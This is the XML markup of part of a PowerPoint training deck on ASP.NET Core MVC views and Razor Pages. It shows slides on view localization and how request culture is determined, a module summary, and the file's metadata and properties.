                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="-1" r="2853"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="3276600"/>
            <a:ext cx="4732944" cy="973256"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="3442116"/>
            <a:ext cx="3581400" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Views &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Home &gt; AboutCompany.cshtml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect r="6598"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="4906690"/>
            <a:ext cx="4732945" cy="884510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638801" y="5056820"/>
            <a:ext cx="3581400" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Views &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Home &gt; Company &gt; About.cshtml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357003952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Request Culture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{AFFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr lang="en-US" kern="0" smtClean="0"/>
              <a:pPr defTabSz="914400" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Query String </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default key is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>culture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://localhost:5000/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>culture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>=en-CA&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>culture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>=fr-FR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using a Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default Cookie name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>AspNetCore.Culture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Accept-Language Header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Header name : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Accept-Language: de-DE, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>en-US;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>=0.8, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>fr-FR;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>=0.7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Custom Request Culture Providers</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Implement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>IRequestCultureProvider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> interface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30112379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Demo: Localization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237500716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dirty="0"/>
              <a:t>Module Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41988" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>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457200" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="457200" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="457200" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="457200" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{498BC885-74B9-4C4D-BE39-DE8A643CAA54}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>In this module, you learned:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Views and their role in MVC pattern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Partial and strongly typed views</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>View engines and Razor view engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Tag Helpers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>View Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Service Injection in Views</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Scaffolding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>HTML5 Markup Elements and Controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Bootstrap</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3517" y="0"/>
            <a:ext cx="4568483" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="267679439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Lab: Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342447396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3892169819"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="In Use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230e9df3-be65-4c73-a93b-d1236ebd677e">CPS089-1839222384-134</_dlc_DocId>
    <_dlc_DocIdUrl xmlns="230e9df3-be65-4c73-a93b-d1236ebd677e">
      <Url>https://microsoft.sharepoint.com/teams/CampusProjectSites089/hahzsakosd/ipdev/_layouts/15/DocIdRedir.aspx?ID=CPS089-1839222384-134</Url>
      <Description>CPS089-1839222384-134</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66375C8FA780A4A9433C215E9C41C5A" ma:contentTypeVersion="7" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="f9cd2a465e15a3cf2ebd573f1729d078">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="230e9df3-be65-4c73-a93b-d1236ebd677e" xmlns:ns3="0ceb57e8-30bb-4ddc-b1ff-c2c8350d6c89" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="16b04afcfef45332ac70667ecd218e24" ns2:_="" ns3:_="">
    <xsd:import namespace="230e9df3-be65-4c73-a93b-d1236ebd677e"/>
    <xsd:import namespace="0ceb57e8-30bb-4ddc-b1ff-c2c8350d6c89"/>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0ceb57e8-30bb-4ddc-b1ff-c2c8350d6c8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1BFF07-BCD7-40E8-9B21-767B2A95642F}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/events"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F867D982-B25E-492D-874E-367DBE4DBDEC}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{93F5D9B4-9A6D-4734-9732-2309DA68A10D}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
    <ds:schemaRef ds:uri="04560d1f-b888-43bb-a39f-fd9886ef0fa8"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="230e9df3-be65-4c73-a93b-d1236ebd677e"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4F7FD285-BFE9-4E60-977D-67DB14F839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0ceb57e8-30bb-4ddc-b1ff-c2c8350d6c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13188</TotalTime>
  <Words>7797</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1054</Paragraphs>
  <Slides>94</Slides>
  <Notes>93</Notes>
  <HiddenSlides>3</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94</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="107" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier 10 Pitch</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>inherit</vt:lpstr>
      <vt:lpstr>Segoe Pro Light</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Segoe UI Light</vt:lpstr>
      <vt:lpstr>SFMono-Regular</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>In Use_Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>How to View This Presentation</vt:lpstr>
      <vt:lpstr>Module 4: Views &amp; Razor Pages</vt:lpstr>
      <vt:lpstr>Module 4: Razor Pages &amp; MVC Views</vt:lpstr>
      <vt:lpstr>View</vt:lpstr>
      <vt:lpstr>Role of a View</vt:lpstr>
      <vt:lpstr>View Creation</vt:lpstr>
      <vt:lpstr>Specifying Views</vt:lpstr>
      <vt:lpstr>Module 4: Razor Pages &amp; MVC Views</vt:lpstr>
      <vt:lpstr>Razor Pages - I</vt:lpstr>
      <vt:lpstr>Razor Pages - II</vt:lpstr>
      <vt:lpstr>Razor Pages - III</vt:lpstr>
      <vt:lpstr>Razor Pages - IV</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Module 4: Razor Pages &amp; MVC Views</vt:lpstr>
      <vt:lpstr>ViewData</vt:lpstr>
      <vt:lpstr>ViewBag</vt:lpstr>
      <vt:lpstr>TempData</vt:lpstr>
      <vt:lpstr>TempData</vt:lpstr>
      <vt:lpstr>Strongly Typed Views</vt:lpstr>
      <vt:lpstr>Partial View</vt:lpstr>
      <vt:lpstr>Partial View (continued)</vt:lpstr>
      <vt:lpstr>Module 4: Razor Pages &amp; MVC Views</vt:lpstr>
      <vt:lpstr>View Component</vt:lpstr>
      <vt:lpstr>View Component [Class]</vt:lpstr>
      <vt:lpstr>View Component [View]</vt:lpstr>
      <vt:lpstr>Asynchronous View Component</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Module 4: Razor Pages &amp; MVC Views</vt:lpstr>
      <vt:lpstr>View Engines</vt:lpstr>
      <vt:lpstr>Razor View Engine</vt:lpstr>
      <vt:lpstr>Razor View</vt:lpstr>
      <vt:lpstr>Code Expressions</vt:lpstr>
      <vt:lpstr>Code Blocks</vt:lpstr>
      <vt:lpstr>Razor Syntax</vt:lpstr>
      <vt:lpstr>Razor Syntax (continued)</vt:lpstr>
      <vt:lpstr>Razor Syntax (continued)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>HTML Encoding</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Module 4: Razor Pages &amp; MVC Views</vt:lpstr>
      <vt:lpstr>Layouts</vt:lpstr>
      <vt:lpstr>Layouts – Default ASP.NET MVC Template</vt:lpstr>
      <vt:lpstr>Layout Sections</vt:lpstr>
      <vt:lpstr>ViewStart</vt:lpstr>
      <vt:lpstr>View Imports</vt:lpstr>
      <vt:lpstr>Sections</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Module 4: Razor Pages &amp; MVC Views</vt:lpstr>
      <vt:lpstr>HTML Helpers</vt:lpstr>
      <vt:lpstr>Built-in HTML Helpers</vt:lpstr>
      <vt:lpstr>Built-in Display Templates</vt:lpstr>
      <vt:lpstr>Built-in Editor Templates</vt:lpstr>
      <vt:lpstr>Display and Editor Templates</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Module 4: Razor Pages &amp; MVC Views</vt:lpstr>
      <vt:lpstr>Tag Helpers</vt:lpstr>
      <vt:lpstr>HTML helpers vs Tag Helpers</vt:lpstr>
      <vt:lpstr>Tag Helper Scope</vt:lpstr>
      <vt:lpstr>Microsoft.AspNet.Mvc.TagHelpers</vt:lpstr>
      <vt:lpstr>Tag Helpers vs. HTML Helper</vt:lpstr>
      <vt:lpstr>Register View with HTML Helpers</vt:lpstr>
      <vt:lpstr>Register View with Tag Helpers</vt:lpstr>
      <vt:lpstr>Label Tag Helper</vt:lpstr>
      <vt:lpstr>Select Tag Helper</vt:lpstr>
      <vt:lpstr>Form Tag Helper</vt:lpstr>
      <vt:lpstr>Link Tag helper</vt:lpstr>
      <vt:lpstr>Custom Tag Helper</vt:lpstr>
      <vt:lpstr>Custom Tag Helper</vt:lpstr>
      <vt:lpstr>Tag Helper vs. Web Server Control</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Module 4: Razor Pages &amp; MVC Views</vt:lpstr>
      <vt:lpstr>Service Injection in Views</vt:lpstr>
      <vt:lpstr>Injected Service Definition and Consumption</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Module 4: Razor Pages &amp; MVC Views</vt:lpstr>
      <vt:lpstr>Scaffold Templates - I </vt:lpstr>
      <vt:lpstr>Scaffold Templates - II</vt:lpstr>
      <vt:lpstr>Default View Organization</vt:lpstr>
      <vt:lpstr>Scaffolding Templates - III</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Module 4: Razor Pages &amp; MVC Views</vt:lpstr>
      <vt:lpstr>View Localization</vt:lpstr>
      <vt:lpstr>View Localization configuration </vt:lpstr>
      <vt:lpstr>Culture</vt:lpstr>
      <vt:lpstr>View Localization mechanics </vt:lpstr>
      <vt:lpstr>Determining Request Culture</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Module Summary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Waqar Aziz</dc:creator>
  <cp:lastModifiedBy>Tanya Do</cp:lastModifiedBy>
  <cp:revision>463</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-09-03T15:53:39Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-01T21:59:11Z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4465360</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="NXPowerLiteSettings">
    <vt:lpwstr>F7000400038000</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="NXPowerLiteVersion">
    <vt:lpwstr>D5.0.6</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="ContentTypeId">
    <vt:lpwstr>0x010100066375C8FA780A4A9433C215E9C41C5A</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waziz@microsoft.com</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_f42aa342-8706-4288-bd11-ebb85995028c_SetDate">
    <vt:lpwstr>2017-10-31T09:43:36.0255598Z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Extended_MSFT_Method">
    <vt:lpwstr>Automatic</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="13" name="Sensitivity">
    <vt:lpwstr>General</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="14" name="_dlc_DocIdItemGuid">
    <vt:lpwstr>c106b32b-2301-4193-9e6f-1af89c9092ee</vt:lpwstr>
  </property>
</Properties>
</file>